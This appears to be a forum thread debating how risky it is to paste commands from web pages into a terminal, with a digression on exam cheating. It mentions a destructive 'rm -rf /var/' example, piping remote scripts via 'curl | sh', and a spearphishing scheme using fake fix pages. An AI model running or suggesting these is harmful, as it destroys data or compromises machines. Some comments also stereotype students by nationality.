So, ok. Don't copy and paste from a website to a terminal, I get it and I got it the last time that this kind of thing was posted. But if I look around I put so incredibly much trust in total strangers all the time that compared to say ordering a pizza (where the cook could put anything in the food they wanted), driving on the highway (where anybody could swerve any moment if they wanted) and simply walking down the street (where that old lady on the left of me could pull a knife and stab me any time they wanted) that you have to wonder if the downsides weigh up against the upsides of simply trusting the website you get the information from and getting on with your life (besides the fact that it is the browser acting in an un-expected way here, the bit selected does not mirror the visual feedback given to the user, this might even simply qualify as a bug).
What is the actual risk here, how many people have been bitten by this sort of thing and what was the resulting damage? I'm not saying there isn't any risk, clearly there is a possibility for exploitation here so chances are this is an actual risk. But I find it hard to make the case that we should all now start re-typing all the text in how-to's and scripts. It's one thing to run wget | curl, quite another to distrust each and every snippet of code on the web. I don't see much difference compared to say installing Ubuntu from a website whose contents I haven't inspected and that may have been built with a bunch of malicious stuff in it, I did not actually inspect all the source code this machine was built up with and I would be busy for half a lifetime if I did, so I outsourced the trust and verify that trust by looking at some checksum but that's about the extent of it.
Is there anybody that can quantify this risk somehow?
Not sure whether this anecdote fits the thread well, but does address "don't copy and paste from a website to, well, anywhere without examining what you just pasted":
I was administering a final exam to a programming class. Exam was done on class computers, so with me in the front of the room most of the time I couldn't actually see what everyone was doing (and given the nature of the class, if you cheated it probably wouldn't really help you anyway).
Grading one student's submission, the wording of most of the "essay" questions seemed ... odd. Nothing objectively wrong, but everyone has their own writing style and his answers weren't, well, his. Scrolling thru one particular answer there were some blank lines after the answer ... and then a URL. The URL contained much of the test question. Checking the unfamiliar site, it was a paid technical-question-answering service, base price for answers $30 and rising depending on depth, quality & speed of answer. Copying-and-pasting the purchased answers added the source URL to the selected text, proving malicious plagiarism on the final exam. I figure he spent at least $300 to fail that exam and get one strike per the school's "three strikes and you're out" policy.
Does your school really have a "three strikes and you're out" policy for plagiarism? It seems like that would almost encourage cheating, up to the point where someone gets their second strike.
In a US university I have noticed that some international students (I was one too) took a very liberal attitude towards cheating, I won't name any specific countries (think East though) and noticed students from those countries played fast loose when it came to cheating. Maybe I am being prejudiced or that particular school had a knack for picking cheaters from some countries but not from others. Anyway just my observation.
My anecdata: I did some work at an Australian university engineering department and there was a cultural disconnect with some of the Chinese students; they did not understand that the university wanted them to figure out problems individually -- supposedly they would get together with the smartest students to figure out the answers, and then share them among themselves.
I went to university both in Spain and Canada, and the approach to cheating is very different. In Spain cheating is pretty much acceptable as long as you don't get caught. And even if you do get caught, usually all that happens is that you fail the exam and you have the option to retake it a month later. I don't know about the rest of Europe.
As it should be. The whole system is underpinned by the assumption that no one can cheat. Everyone knows tons of people cheat, but any university who has a "n-strike" policy for academic dishonesty (aka fraud), is purely in it for the money. To students who busted their asses to graduate legitimately, it's a hard slap in the face.
That's way too hardline, surely some people are wrongly accused or some cases are borderline. This sort of "zero tolerance" nonsense always just ends up removing human judgement and common sense from the equation.
Also the idea that "the system is underpinned by the notion nobody can cheat" is absurd. Cheating is rampant! Even in the ivy leagues. Especially in the ivy leagues! But people still value college degrees.
Cheating is rampant, but that doesn't mean that we all as a society don't still ignore that fact! It's a beautiful display of cognitive dissonance. There's no way to know if someone truly achieved their degree, so you have to test them, which is one of the reasons the degree was valuable. You shouldn't have to test someone if they had certain credentials. They've passed their rigorous training program.
I'm not really a fan of no tolerance policies; I would rather the system be re-evaluated so that credentialing and training are the goals of the system, not pushing as many credit hours through the administration as possible. :)
I probably have super skewed view on the matter, but what is the point of expelling someone for cheating? Not everyone learns the same way and not everyone needs the same set of skills/knowledge. I feel like people put way too much value on a degree considering what real world is like.
So far in my short SW engineering career I haven't used a single thing I "learned" from my B.Sc degree, but what school did was to let me hang around with same minded people for few years which encouraged us to work on side projects together which taught us way more than any class.
That being said, I didn't cheat either, but I don't think cheating once is a good grounds for expelling someone.
As your instructor you are asking me to certify, on my professional reputation and honor, that you know the material and can be expected to perform to minimum standards. If you cheat, you are untrustworthy, disrespectful, incompetent, and willing to engage in behavior which can cost a company millions - or even get people killed. He11 yeah I'll want you expelled.
I was this kind of student, to the bemusement of people at my year. And I can say we like to tell ourselves that - that by honest learning we somehow gained more. But to be honest, what you do at work is so different than what you learn at university that in retrospect, you may just cheat your way through bullshit exams. If you're an autodidact, it could be even better for you, since you won't waste so much time learning nonsense to pass arbitrary performance bars.
I'm not encouraging cheating here. But I learned that sometimes you have to accept that you hold to some rules just because morality, and you don't need to invent practical reasons to justify it to yourself and others. Sometimes following the rules leaves you worse off, but the world where people follow those rules is better for everyone than the world where they don't, and I want to live in the former.
I feel much the same way. Especially centered around worthless electives classes when I was studying maths. If I was interested in "Movies & Music," I would be reading about it already, and it's completely unrelated to my subject matter.
"Three strikes" would be 3 major offenses like flagrant plagiarism/cheating. I was rather surprised buying answers to a final exam wasn't sufficient for expulsion. Didn't dig into the policy details further.
My school gives undergrads one warning before kicking you out for academic dishonesty. However, we've been repeatedly reminded that graduate students know better and we'll get kicked out for a first instance of plagarism
Usually these policies work where the first strike is a zero on the assignment, the second strike is a F in the class, and the third strike is getting expelled from the school.
And I thought it was ridiculous when someone had cut and pasted a page from an Oracle manual in response to a set of pre-screening questions for a hiring round, headers included (for a generic SQL question we expected a one sentence answer to).
At least that guy didn't pay for it - to my knowledge at least (he did cut and paste most of his answers from various places, though, and got many of them wrong, including an word-for-word copy of an answer from a forum where the answer he had quoted was torn to pieces by other commenters right below).
Isn't the first place you would go to the Oracle manual? I use stack overflow all the time these days (documentation pages before that existed), not quite cutting and pasting but close enough.
The most important skill is to know how to look something up.
No one knows everything; or even a majority of things. How fast you can find an answer is what determines your productivity. Whether its via a book, a man page, google, stack overflow, or asking the right people doesn't matter.
For a basic SQL question? No. I'd never even seen an Oracle manual prior to that, and I haven't since.
If I needed specifics about Oracle, sure. I don't expect to ever need that.
But the more important aspect was that the full, complete answer to the question we raised took a single, short sentence. It was not clear from the page he had cut and pasted whether or not he even understood the question, so even if he hadn't copied it without telling us the source we'd not have considered it an acceptable answer.
Keep in mind that if the paste buffer includes a newline, everything preceding that newline will be executed. Pasting into an intermediate buffer, like a text editor, would be advisable.
It's a different threat model to your other examples though. The pizza guy, the driver, the lady down the street, unless they know you and have something against you, they would want to target you with no apparent motive in your examples. There is plenty of motive to hack random computers by just putting up a malicious website. And people try to do it all the time, and install malware with various degrees of stealth. It's not really an unknown or crazy threat.
The website threat model also allows the bad guy to target someone by IP, or some country, or only put the malicious code 1 in 1000 times, so it's not going to be widely noticed, etc.
Or it could be an HTTP (not -S) website and someone MitMs you (OK that is a pretty far-fetched attack vector for someone who MitMs you, I admit).
edit: although I agree with you that I've personally never encountered a case where this specific malicious trick happened
> It's a different threat model to your other examples though. The pizza guy, the driver, the lady down the street, unless they know you and have something against you, they would want to target you with no apparent motive in your examples.
No obvious motive or relationship is needed, especially when mental illness is considered. It could be that some stranger who lives elsewhere is walking down your street and might be looking to mug someone.
But if I look around I put so incredibly much trust in total strangers all the time that compared to say ordering a pizza (where the cook could put anything in the food they wanted), driving on the highway (where anybody could swerve any moment if they wanted) and simply walking down the street (where that old lady on the left of me could pull a knife and stab me any time they wanted) that you have to wonder if the downsides weigh up against the upsides of simply trusting the website you get the information from and getting on with your life
2) It's very likely the perpetrator will get caught.
3) No one else is left with control over your resources
Trusting a script from a website to the point where you execute it in your terminal could result in someone controlling a rootkit on your machine, without you ever knowing, with little chance of a savvy perpetrator getting caught, and with all of your operating system tools subsequently lying to you about any information you could use to detect the event.
That said, I've trusted such scripts and "gotten on with my life" on several occasions.
Similarly, running "make" in the directory of a freshly downloaded repo is dangerous too. It's really difficult to check all code running on our behalf and to quantify the risks.
If someone take control of a popular git repo and push a malicious build script. How many people will be affected before the fix ?
Good point. It is important to realize that being too obsessive about security is possible, and to know a reasonable point at which to draw the line.
But there is a difference between the two types of attack you describe that seems to change the rules on the web at least somewhat.
The difference is risk to the attacker. If I start punching someone on the bus, getting thrown off is the optimistic outcome. I could reasonably expect to be arrested, or assaulted in return, possibly fatally.
But if I post malware on the web, the worst I could reasonably expect is that the offending content is taken down, my account with that host rescinded, and assuming I do nothing to conceal my identity, I may become known as the type of scumbag who does such things. I grant that much worse results are possible, but it just doesn't seem realistic to expect much worse punishment, so long as a government or large corporation wasn't a serious victim.
While I agree with you, I also think this line of reasoning is a distraction. If we could prevent people from punching you on the bus by technological means with very little drawback, we would.
It's hard for me to see what is the difference between people who question formalizing best practices in computing and people who disagree with modern car engines and seatbelt laws.
We do these things not because it always makes a difference for one single person all the time but because it the system move in the right direction leading to possibilities we couldn't foresee from the beginning.
Someone who works in "real world" security and always have to weight in the downsides, e.g. the implications of privacy when installing a security camera on a bus, must think we are crazy questioning such low hanging fruit.
This is a great point, and something I often wonder about as well. I think it's reasonable to think that only a compromised site or site run by someone with ill-intent would pose any real risk. And in such a scenario, it's going to get out pretty quickly that the site is compromised/dangerous.
While this doesn't help that theoretical set of initial victims, it just doesn't feel like a credible risk worthy of too much worry, especially for information from higher profile sites with reputable backing.
Perhaps the solution here is better mechanisms for validating what a script can do - "script is attempting to access xyz, allow? y/n".
Little Snitch serves this purpose to some extent on OS X. If the malicious hidden script invoked a remote server I'd get a popup asking if I would like to allow it.
And in such a scenario, it's going to get out pretty quickly that the site is compromised/dangerous.
If a perpetrator is smart, the malicious script is going to be hidden a few invocation layers deep, and will only remain up for short intervals. A naive or stupid perpetrator is going to get caught quickly. But the medium is such that a smart one can hope to evade detection.
I do that regardless because I'm super paranoid about stuff like this but I'm really wondering if I'm not taking it a bit too far. I've also yet to run into any kind of attempt to pull a stunt like this in a very long time of activity so I'm wondering what the actual incidence is.
I generally find it worth it for the simple risk that you may end up breaking stuff without anything malicious on behalf of the site.
E.g. cut and paste a command and get a linebreak in the wrong location and the "rm -rf /var/tmp/foo" turns into "rm -rf /var/". Fun times.
These days I'm more and more often just spinning up temporary containers as well. Not so much for security as to avoid making a mess of my environment with all the stuff I'm testing. So trivial to start out with a "docker run --rm -t -i ubuntu -v /some/suitable/host/dir:/mnt /bin/bash -l" or similar to get a fresh container with a directory I can dump anything I decide I want to keep in.
So is it safe to cut-and-paste that line there ;) ?
I type very fast but if I see a 100+ character line with a whole bunch of flags and what not the chances of introducing a fatality while re-typing it (was that / var or /var?) are quite large.
And of course anything that involves 'rm' or other nice and friendly commands gets an extra eyeball but at some point you have to decide to pull the trigger or not.
I do not do that. I have copied and pasted git clone commands directly in my terminals many times. The questions is, for those who do it, how often you notice a malicious command and this saves your day.
I've never encountered a malicious command in the wild, but having the commands I execute saved in a "notes.txt" or a wiki page I keep to document whatever I'm doing at any given time, sure has saved my day more than once. Usually several days after, when I can look back at what I did and replicate, fix or enhance whatever procedure.
So if it also protects me against this, I say doubleplusgood.
"What is the actual risk here, how many people have been bitten by this sort of thing and what was the resulting damage?"
Exactly. And what I essentially typically say is "the scope of the problem has not been defined".
We see this often on news reports on TV as an example. They go off with hyperbole about some issue but fail to address exactly how many people have been effected by it. Simply saying things like "there is a growing concern..." or cherry picking examples.
We see this now with cases of "police brutality" and use of unwarranted force. It's not that it doesn't exist, but that any reports totally ignore how often it actually happens vs. how many times it doesn't happen.
I think the message is mostly directed at developers. It's worth noting that a developer's PC is often a very good target. It carries a lot of power, i.e. source codes, host names and private keys, etc. So even the number is small, a targeted attack might have a big impact. And a targeted attack is much, much more difficult to quantify or even study.
Not burned in the sense that I executed some hidden commands in the terminal, but I've tried pasting snippets of text in IRC and ended up pasting several lines of text that absolutely did not select.
While this may not be a huge issue in practice, I have no idea what motivates the inclusion of functionality that manipulates the clipboard in the browser. I don't really think that the analogies of anyone swerving on the highway or someone poisoning your pizza apply. It's more like your seat belts were deliberately removed, or someone put arsenic right next to the pizza box just in case anyone would want to poison you.
Technically, they're not manipulating the clipboard at all. That is definitely disallowed by browsers. What they are doing is extending the selection to an invisible part of the page, so you're copying more than you bargained for.
But without being able to manipulate selections, some nice features of certain sites would be lost. (e.g. the "share" link in StackOverflow automatically selects the URL for you so you only need to press Ctrl-C, instead of having to select it manually.)
> I have no idea what motivates the inclusion of functionality that manipulates the clipboard in the browser.
I'm not sure, but I expect that it's the same sort of thing that motivates the inclusion of the ability to enable page content obfuscation schemes that -say- scramble a page's plaintext, but use CSS styles and JS voodoo to make it appear like the page contains only comprehensible text.
I expect that -when using such a scheme-, you'd need to be able to modify what is being tossed on to the clipboard, as -I expect that- the inbuilt selection tool will pick up your garbage data as well as the intended text. [0]
Edit: To be a little more practical, you could (for instance) use the ability to modify the contents of a clipboard to -say- create custom representations of your web application data formats and allow relatively easy transfer between instances of the software.
[0] Yes, I do recognize that allowing copy and paste kinda defeats the purpose of this scheme, but the scheme is something that I've seen in the wild.
It's not just trust in strangers - its trust in the strangers and whomever may have infected the stranger with a mind-control parasite.
For web-sites, that includes direct hacks that make the site distribute malware, as well as "malvertising", etc.
So that old lady next to you may actually be the gang of thugs waiting in a dark alley.
But I don't think that the malware distributors are likely to choose an uncommon channel like copy-and-paste as a distribution vector, so you're probably still OK.
Except its very uncommon to be poisoned or stabbed and very common for IT systems to be hacked, because there's a pretty big incentive to do so (setup a spamming farm, steal data, enlarge a botnet, script kiddie cred, etc).
>Has anybody been personally burned by this?
I imagine a lot of devs who follow bad practices cause a lot of havok, but its up to the security and sysadmin team to clean up after them. They may not be fully aware of all their bad practices and a refrain of "Let us be bad, it hasn't caused any problems yet," is short-sighted.
>say installing Ubuntu from a website
At the very least you have a SSL identified site and published checksum hashes on a separate server. That's a far cry from a random shell script. Installing an OS is a special case anyway, so its not really a good comparison here.
I've seen a gist posted at bitcointalk (a scammerful place) to do currency convert in php or js, can't remember. The gist contained hidden code at column 300. Not that I was personally burned, but yea, I've seen in it the wild.
The title of this piece should be "check out this cool trick I learned." Then it could have been a quarter the length and wouldn't have had to have been couched with all the motherly scolding.
If you trust the source, you might as well install it. Otherwise, we're basically arguing that everyone who has ever installed any non-distro software is an idiot.
Consuming http or the connection dying and script ending early and being left in a weird state is probably a more interesting argument than the trust issue.
The connection-closed problem can be solved by wrapping the code in the script within a function, then calling that function at the end of the script. Of course, that needs to be done by the software's author, but we trust the authors of our software if we're going to run it, yes?
It would make for a good spearphishing attack. If you know the target's stack and can guess what sorts of issues they might run into, you can throw up a few pages detailing fixes for those issues. Give half-right answers on stack and link to your honeypot for "more in-depth discussion of the issue". Then sit back and wait for a dev to run your "fix" on one of their servers.
That's too much work. It would be easier to just tell them to curl | sh and put all your malicious stuff in the script. That way they won't actually see anything malicious on their screen.
That requires more stupidity on the target's part. I think most devs know not to `curl | sh` random scripts, but something as innocuous as `ps -ef | grep /some/longish/annoying/path/to/script` would seem both safe at first glance and long enough to want to avoid typing.
With both binaries and curl|sh, trust in the source is a major factor in whether or not you do it. But copying an innocuous-looking terminal command (like `ps | grep`) doesn't seem like it would require trust.
I'll absolutely grab a binary or `curl | sh` from slack.com. I won't do it from a forum. But I would copy a terminal command that didn't look like it was doing anything fishy from a forum.
For a long time I had the bash fork bomb without any further explanation as my signature line on /, I'd just about forgotten about it when I got a really angry email from someone telling me that I'd blown up his server and thanks very much for that.
It's the same level of risk experienced, when dealing with the types of individuals who invariably always download and execute unsafe email attachments, click malicious links in emails, respond to chain letters, business solicitations from Nigerian princes, and so on, and so on, and so on...
People get burned by this sort of thing all the time, malicious downloads were hip when Clinton was in the White House. Yes, only on Windows, and yes, easy to thwart if you know what to look for, but it's disingenuous to say that it's never happened. These things are attacks on your ability to recognize and be vigilant, and you can't recognize and be vigilant of everything at the same time.
Obviously the particular vector of console pastes hasn't been exploited yet but that doesn't mean it won't ever. When it does, we'll mourn the passing of our current free-wheeling days the same way we mourn the old Usenet.
Not sure you will anything more than anecdotal evidence but the propensity of people I've interviewed to go to a site like Stack Overflow and cut/paste "solutions" into their shell or terminal is sadly quite large. I much prefer people who can internalize the core knowledge of their craft over those who are living with all their technical knowlege currently swapped out to the web.
I think you're wildly underestimating how much "core knowledge" there is in the entire field of computing. You can be a absolute master of several disciplines and still need help when stepping outside that area.
In my experience, this sort of attitude leads to things like people saying "What the hell? Your resume said you knew Linux!" when you fail to know every single quirk of the specific unpopular distro that they're using. Don't be that guy.
If you'd be capable of injecting this sort of trick into stackoverflow that would be news. It's all about the source...
And truth be told, I have used stackoverflow to look up things, even things that I knew before but somehow lost due to inactivity, a lack of RAM refresh so to speak. I'm not ashamed of that and the IT field is now so incredibly broad that I don't feel that I'm the exception there, it's very hard to keep all of the moving parts of a webstack in your head and even harder to keep up when the platforms are changing right underneath you.
And yet I don't feel as if I fall under the 'guy that hasn't internalized the core knowledge of our craft' rule :)
Thats normal (I think). Its one of those use "every 6 months" commands, once you get away from the usual tar -xzvf falgs.(Enough tiime to know it exists but too long to remember the actulay syntax).
Ditto rsync and the more obscure gcc stuff (though that usually ends up in makefiles rather than be typed in on the command line after trying it the first time).
I think, though I'm not sure I can explain why exactly, there's a difference between using one utility—Google—to answer all questions (with no real understanding of what's the 'right' place to ask), and doing focussed research—even if that focus is as minor as just reading the relevant documentation for the specific question.
At some level google (or ddg or whatever you use) is the new 'man'. Especially since many man pages now simply read:
"The GNU folks, in general, abhor man pages, and create info documents instead. Unfortunately, the info document describing tar is licensed under the GFDL with invariant cover texts, which makes it impossible to include any text from that document in this man page. Most of the text in this document was automatically extracted from the usage text in the source. It may not completely describe all features of the program."
I agree; it comes down to trusting your source. I trust, say, github and bitbucket, and will gladly copy-paste their commands into my terminal. I'm already trusting them with much more.
I would hope that with all the resources they command that the NSA would not resort to methods involving such co-operation by their intended victims. Though anything goes I guess and why bother doing something intricate certain if something dumb and chancy works just as well.
They frequently use methods where you have to double-click on an email attachment. Most people consider cut-and-paste from a web site to be safer than that.
Also, non-TLS web sites can potentially be hijacked in flight, so this could happen even if the site in question wasn't directly cooperating.
What is the actual risk here, how many people have been bitten by this sort of thing and what was the resulting damage? I'm not saying there isn't any risk, clearly there is a possibility for exploitation here so chances are this is an actual risk. But I find it hard to make the case that we should all now start re-typing all the text in how-to's and scripts. It's one thing to run wget | curl, quite another to distrust each and every snippet of code on the web. I don't see much difference compared to say installing Ubuntu from a website whose contents I haven't inspected and that may have been built with a bunch of malicious stuff in it, I did not actually inspect all the source code this machine was built up with and I would be busy for half a lifetime if I did, so I outsourced the trust and verify that trust by looking at some checksum but that's about the extent of it.
Is there anybody that can quantify this risk somehow?
Has anybody been personally burned by this?